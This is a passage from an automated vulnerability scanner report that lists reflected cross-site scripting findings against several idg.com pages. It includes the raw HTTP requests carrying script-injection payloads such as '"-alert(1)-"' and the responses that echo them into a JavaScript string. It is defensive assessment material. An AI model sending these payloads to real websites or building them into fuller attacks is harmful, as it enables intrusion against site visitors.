Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:30 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5012
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www2d84b";ec78c03d4d3/homenew.nsf/tabs.css");
} catch(err) {}</script>
...[SNIP]...

2.231. http://idg.com/www/homenew.nsf/tabs.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/tabs.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cb7c"%3b884c5baffb3 was submitted in the REST URL parameter 3. This input was echoed as 6cb7c";884c5baffb3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/tabs.css6cb7c"%3b884c5baffb3 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:32 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5012
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/tabs.css6cb7c";884c5baffb3");
} catch(err) {}</script>
...[SNIP]...

2.232. http://idg.com/www/homenew.nsf/tabs.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/tabs.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a98c2"-alert(1)-"0fa26d0ed6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/tabs.css?a98c2"-alert(1)-"0fa26d0ed6d=1 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:29 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5025
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/tabs.css?a98c2"-alert(1)-"0fa26d0ed6d=1");
} catch(err) {}</script>
...[SNIP]...

2.233. http://idg.com/www/idgproducts.nsf/2010mklanding.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/idgproducts.nsf/2010mklanding.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11302"%3b713a0a694b9 was submitted in the REST URL parameter 1. This input was echoed as 11302";713a0a694b9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www11302"%3b713a0a694b9/idgproducts.nsf/2010mklanding.html HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:03 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5026
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www11302";713a0a694b9/idgproducts.nsf/2010mklanding.html");
} catch(err) {}</script>
...[SNIP]...

2.234. http://idg.com/www/idgproducts.nsf/2010mklanding.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/idgproducts.nsf/2010mklanding.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b5e4"%3bdd15fff9613 was submitted in the REST URL parameter 3. This input was echoed as 3b5e4";dd15fff9613 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgproducts.nsf/2010mklanding.html3b5e4"%3bdd15fff9613 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:03 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5026
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/2010mklanding.html3b5e4";dd15fff9613");
} catch(err) {}</script>
...[SNIP]...

2.235. http://idg.com/www/idgproducts.nsf/2010mklanding.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/idgproducts.nsf/2010mklanding.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a606"-alert(1)-"6588e540550 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgproducts.nsf/2010mklanding.html?2a606"-alert(1)-"6588e540550=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:02 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5039
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/2010mklanding.html?2a606"-alert(1)-"6588e540550=1");
} catch(err) {}</script>
...[SNIP]...

2.236. http://idg.com/www/idgproducts.nsf/countries [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/idgproducts.nsf/countries

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69e6d"%3b73cbff7633e was submitted in the REST URL parameter 1. This input was echoed as 69e6d";73cbff7633e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www69e6d"%3b73cbff7633e/idgproducts.nsf/countries HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:08 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5017
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www69e6d";73cbff7633e/idgproducts.nsf/countries");
} catch(err) {}</script>
...[SNIP]...

2.237. http://idg.com/www/idgproducts.nsf/countries [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/idgproducts.nsf/countries

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d857"%3b7485e1d876f was submitted in the REST URL parameter 3. This input was echoed as 5d857";7485e1d876f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgproducts.nsf/countries5d857"%3b7485e1d876f HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:08 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5017
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/countries5d857";7485e1d876f");
} catch(err) {}</script>
...[SNIP]...

2.238. http://idg.com/www/idgproducts.nsf/countries [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/idgproducts.nsf/countries

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d3b0"-alert(1)-"3350bf4334c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. In the echoed script the argument to _trackPageview becomes the expression "IDG.com - Page not found - ...?3d3b0" - alert(1) - "3350bf4334c=1": the injected double quote closes the original literal, the two subtraction operators keep the statement syntactically valid, and alert(1) is evaluated as an operand before _trackPageview is ever called. The surrounding try/catch does not prevent this, since nothing throws, and the 400 status of the response does not stop a browser from executing the page body.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgproducts.nsf/countries?3d3b0"-alert(1)-"3350bf4334c=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:08 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5030
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/countries?3d3b0"-alert(1)-"3350bf4334c=1");
} catch(err) {}</script>
...[SNIP]...

2.239. http://idg.com/www/idgproducts.nsf/countries [openview parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/idgproducts.nsf/countries

Issue detail

The value of the openview request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4603a"-alert(1)-"811e7d0ebea was submitted in the openview parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgproducts.nsf/countries?openview4603a"-alert(1)-"811e7d0ebea HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:09 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5036
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/countries?openview4603a"-alert(1)-"811e7d0ebea");
} catch(err) {}</script>
...[SNIP]...

2.240. http://idg.com/www/idgproducts.nsf/productfinder [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/idgproducts.nsf/productfinder

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9721d"%3b2db346ab689 was submitted in the REST URL parameter 1. This input was echoed as 9721d";2db346ab689 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www9721d"%3b2db346ab689/idgproducts.nsf/productfinder HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:56 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5021
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www9721d";2db346ab689/idgproducts.nsf/productfinder");
} catch(err) {}</script>
...[SNIP]...

2.241. http://idg.com/www/idgproducts.nsf/productfinder [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/idgproducts.nsf/productfinder

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75d4b"%3b50ad274776d was submitted in the REST URL parameter 3. This input was echoed as 75d4b";50ad274776d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgproducts.nsf/productfinder75d4b"%3b50ad274776d HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:57 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5021
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/productfinder75d4b";50ad274776d");
} catch(err) {}</script>
...[SNIP]...

2.242. http://idg.com/www/idgproducts.nsf/productfinder [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/idgproducts.nsf/productfinder

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de78f"-alert(1)-"626e657ea96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgproducts.nsf/productfinder?de78f"-alert(1)-"626e657ea96=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:56 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5034
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/productfinder?de78f"-alert(1)-"626e657ea96=1");
} catch(err) {}</script>
...[SNIP]...

2.243. http://idg.com/www/idgproducts.nsf/productfinder [readform parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/idgproducts.nsf/productfinder

Issue detail

The value of the readform request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 977b5"-alert(1)-"03a962af87d was submitted in the readform parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgproducts.nsf/productfinder?readform977b5"-alert(1)-"03a962af87d HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:59 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5040
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/productfinder?readform977b5"-alert(1)-"03a962af87d");
} catch(err) {}</script>
...[SNIP]...

2.244. http://idg.com/www/idgproducts.nsf/typeform [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/idgproducts.nsf/typeform

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b36f5"%3b3f4328df7 was submitted in the REST URL parameter 1. This input was echoed as b36f5";3f4328df7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwb36f5"%3b3f4328df7/idgproducts.nsf/typeform HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:58 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5014
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwb36f5";3f4328df7/idgproducts.nsf/typeform");
} catch(err) {}</script>
...[SNIP]...

2.245. http://idg.com/www/idgproducts.nsf/typeform [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/idgproducts.nsf/typeform

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e35de"%3b134e9857aa3 was submitted in the REST URL parameter 3. This input was echoed as e35de";134e9857aa3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgproducts.nsf/typeforme35de"%3b134e9857aa3 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:59 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5016
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
